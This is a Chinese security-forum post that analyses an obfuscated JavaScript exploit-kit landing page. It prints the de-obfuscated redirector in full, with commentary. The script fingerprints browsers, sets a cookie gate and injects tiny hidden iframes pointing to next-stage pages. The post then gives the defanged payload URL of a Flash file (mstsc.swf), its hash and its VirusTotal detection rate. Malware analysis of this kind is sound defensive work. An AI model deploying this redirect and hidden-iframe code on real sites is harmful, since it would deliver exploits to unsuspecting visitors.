本帖最后由 m220011 于 2017-1-23 03:17 编辑
to
[mw_shl_code=javascript,true]<html>
<head>
<meta name="renderer" content="ie-comp">
</head>
<body>
<script type="text/javascript">
// String table for the whole script: every property name, UA token and markup
// fragment used below is fetched from this array by index, so the code itself
// carries no readable literals.
// Indices used below (read straight off the array):
//   3 toLowerCase, 4 userAgent, 5 getDate, 6 setDate, 7 cookie, 11 toGMTString,
//   14 match, 16 indexOf, 17 mimeTypes, 18 reload, 19 location, 22 writeln,
//   24 submit, 25 tbf, 26 forms, 27 opener, 28 _self, 29 open, 30 close,
//   15 chrome, 36 qqbrowser, 38 msie, 39 "nt 5", 40 "nt 6", 41 "msie 10",
//   42 trident, 43 rv:11, 34 application/vnd.chromium.remoting-viewer.
var _0xafa7 = ["SmrTss", "ErsJg", "srt", "toLowerCase", "userAgent", "getDate", "setDate", "cookie", "=", "", ";expires=", "toGMTString", "(^| )", "=([^;]*)(;|$)", "match", "chrome", "indexOf", "mimeTypes", "reload", "location", "<iframe src=", ".html width=30 height=1></iframe>", "writeln", "<form name='tbf' action='index.html' method='get' target='_blank'><input type='text' name='id' value='1' /></form>", "submit", "tbf", "forms", "opener", "_self", "open", "close", "mlcs", "myrefresh()", "type", "application/vnd.chromium.remoting-viewer", " ", "qqbrowser", "index.html", "msie", "nt 5", "nt 6", "msie 10", "trident", "rv:11", "window.location='", ".html'"];
// bugatti = "SmrTss" and ferrari = "ErsJg" are base names of the next-stage pages
// (".html" is appended where they are used); astonmartin = "srt" is the cookie name.
var bugatti = _0xafa7[0],
ferrari = _0xafa7[1],
astonmartin = _0xafa7[2];
// WhatIE = navigator.userAgent.toLowerCase(); all browser checks below are
// substring tests against this lower-cased User-Agent string.
var WhatIE = navigator[_0xafa7[4]][_0xafa7[3]]();
// Sets a cookie through document.cookie.
//   _0x24a6x6: cookie name
//   _0x24a6x7: cookie value, passed through escape()
//   _0x24a6x8: number of days added to today's date for the expiry; when it is
//              null/undefined no ";expires=" attribute is appended.
function setCookie(_0x24a6x6, _0x24a6x7, _0x24a6x8) {
var _0x24a6x9 = new Date();
// date.setDate(date.getDate() + days)
_0x24a6x9[_0xafa7[6]](_0x24a6x9[_0xafa7[5]]() + _0x24a6x8);
// document.cookie = name + "=" + escape(value) + (days == null ? "" : ";expires=" + date.toGMTString())
document[_0xafa7[7]] = _0x24a6x6 + _0xafa7[8] + escape(_0x24a6x7) + ((_0x24a6x8 == null) ? _0xafa7[9] : _0xafa7[10] + _0x24a6x9[_0xafa7[11]]())
}
// Reports whether a cookie with the given name is present.
// Despite the name, it returns true/false rather than the cookie's value.
//   _0x24a6xb: cookie name, concatenated unescaped into the pattern
//              "(^| )" + name + "=([^;]*)(;|$)"
function getCookie(_0x24a6xb) {
var _0x24a6xc, _0x24a6xd = new RegExp(_0xafa7[12] + _0x24a6xb + _0xafa7[13]);
// document.cookie.match(pattern); the match result is assigned but only its truthiness is used
if(_0x24a6xc = document[_0xafa7[7]][_0xafa7[14]](_0x24a6xd)) {
return true
} else {
return false
}
}
// Returns true when the lower-cased User-Agent contains "chrome" at an index
// greater than 1.
// NOTE(review): the comparison is "> 1", not the "> -1" used by the other UA
// checks in this script; a match at index 0 or 1 would be reported as false.
function isChrome() {
// navigator.userAgent.toLowerCase()
var _0x24a6xf = navigator[_0xafa7[4]][_0xafa7[3]]();
// ua.indexOf("chrome") > 1
return _0x24a6xf[_0xafa7[16]](_0xafa7[15]) > 1
}
// Scans navigator.mimeTypes and returns true if any entry has property
// _0x24a6x11 loosely equal (==) to _0x24a6x7, otherwise false.
// The only call in this script passes ("type",
// "application/vnd.chromium.remoting-viewer"), i.e. it asks whether the browser
// registers that MIME type.
function _mime(_0x24a6x11, _0x24a6x7) {
// navigator.mimeTypes
var _0x24a6x12 = navigator[_0xafa7[17]];
// for...in walks every enumerable key of the collection, not only the numeric indices
for(var _0x24a6x13 in _0x24a6x12) {
if(_0x24a6x12[_0x24a6x13][_0x24a6x11] == _0x24a6x7) {
return true
}
};
return false
}
// Reloads the current page: window.location.reload().
// Invoked by name from the string "myrefresh()" handed to setTimeout in the
// top-level code, so a search for direct callers finds none.
function myrefresh() {
window[_0xafa7[19]][_0xafa7[18]]()
}
// Writes an iframe into the document with document.writeln, pointing at
// bugatti + ".html" (SmrTss.html, a relative URL) and sized width=30 height=1.
// The 30x1 frame loads the next page while staying effectively invisible.
function bu() {
// document.writeln("<iframe src=" + bugatti + ".html width=30 height=1>...")
document[_0xafa7[22]](_0xafa7[20] + bugatti + _0xafa7[21])
}
// Same as bu() but for ferrari: writes a width=30 height=1 iframe whose src is
// ferrari + ".html" (ErsJg.html, a relative URL) using document.writeln.
function fe() {
// document.writeln("<iframe src=" + ferrari + ".html width=30 height=1>...")
document[_0xafa7[22]](_0xafa7[20] + ferrari + _0xafa7[21])
}
// Writes a fixed form into the document with document.writeln: name 'tbf',
// action 'index.html', method 'get', target '_blank', with one text input
// id=1. The parameter _0x24a6x18 is never read; the action is hard-coded in the
// string table entry, not taken from the argument.
function openN(_0x24a6x18) {
document[_0xafa7[22]](_0xafa7[23])
}
// Submits the 'tbf' form written by openN() and then tries to close the
// current window. Because the form's target is '_blank', the submission opens
// index.html?id=1 in a new window or tab.
function sumit() {
// document.forms.tbf.submit()
document[_0xafa7[26]][_0xafa7[25]][_0xafa7[24]]();
// window.opener = null; window.open("", "_self"); window.close()
// NOTE(review): this looks like the usual sequence for closing a window without
// a confirmation prompt in older browsers - confirm against the targeted versions.
window[_0xafa7[27]] = null;
window[_0xafa7[29]](_0xafa7[9], _0xafa7[28]);
window[_0xafa7[30]]()
}
// Entry logic: cookie gate, then browser fingerprinting that selects which
// next-stage page (if any) is loaded.
//
// Cookie gate: when no "srt" cookie exists, set srt=mlcs with a 1-day expiry and
// reload the page after 1 second. setTimeout receives the string "myrefresh()",
// which the browser evaluates as code. The branches below still run on this
// first load; nothing here returns early.
if(!getCookie(astonmartin)) {
setCookie(astonmartin, _0xafa7[31], 1);
setTimeout(_0xafa7[32], 1000)
};
// "is" records whether the MIME-type probe matched.
var is = false;
if(isChrome()) {
// _mime("type", "application/vnd.chromium.remoting-viewer")
// NOTE(review): presumably a fingerprint for one specific Chromium-based
// browser - confirm which. When it matches, only a single space is written and
// every delivery branch below is skipped.
is = _mime(_0xafa7[33], _0xafa7[34]);
if(is) {
document[_0xafa7[22]](_0xafa7[35])
}
};
if(!is) {
// UA contains "chrome" and "qqbrowser": write the form, submit it to
// index.html in a new window, then close this window.
if(isChrome() && WhatIE[_0xafa7[16]](_0xafa7[36]) > -1) {
openN(_0xafa7[37]);
sumit()
} else {
// UA contains "msie" OR "nt 5" OR "nt 6": hidden iframe to ErsJg.html.
// The test is an OR, so any UA carrying "nt 5" or "nt 6" takes this branch
// whether or not it also contains "msie".
if(WhatIE[_0xafa7[16]](_0xafa7[38]) > -1 || WhatIE[_0xafa7[16]](_0xafa7[39]) > -1 || WhatIE[_0xafa7[16]](_0xafa7[40]) > -1) {
fe()
} else {
// UA contains "nt 6" AND "msie 10": hidden iframe to SmrTss.html.
// Unreachable as written: any UA containing "nt 6" was already taken by the
// branch above, so bu() is never called from here.
if(WhatIE[_0xafa7[16]](_0xafa7[40]) > -1 && WhatIE[_0xafa7[16]](_0xafa7[41]) > -1) {
bu()
} else {
// UA contains "trident" AND "rv:11": after 6 seconds navigate the whole page
// to SmrTss.html through a string-form setTimeout
// ("window.location='SmrTss.html'"). Only reached when the UA contains none of
// "msie", "nt 5", "nt 6".
if(WhatIE[_0xafa7[16]](_0xafa7[42]) > -1 && WhatIE[_0xafa7[16]](_0xafa7[43]) > -1) {
setTimeout(_0xafa7[44] + bugatti + _0xafa7[45], 6000)
}
}
}
}
}
</script>
</body>
</html>[/mw_shl_code]
to
<iframe src=ErsJg.html width=30 height=1></iframe>
to
hxxp://125.65.83[.]220:280/mstsc.swf
https://www.virustotal.com/zh-cn ... nalysis/1485112329/
SHA256: c9e925743942f0aa3782ac84389d9ecf9a080492ea02797206b6cef095b5a0d0
文件名: mstsc.swf
检出率: 2 / 54
手生了,解得好慢啊,附件上不来,算了。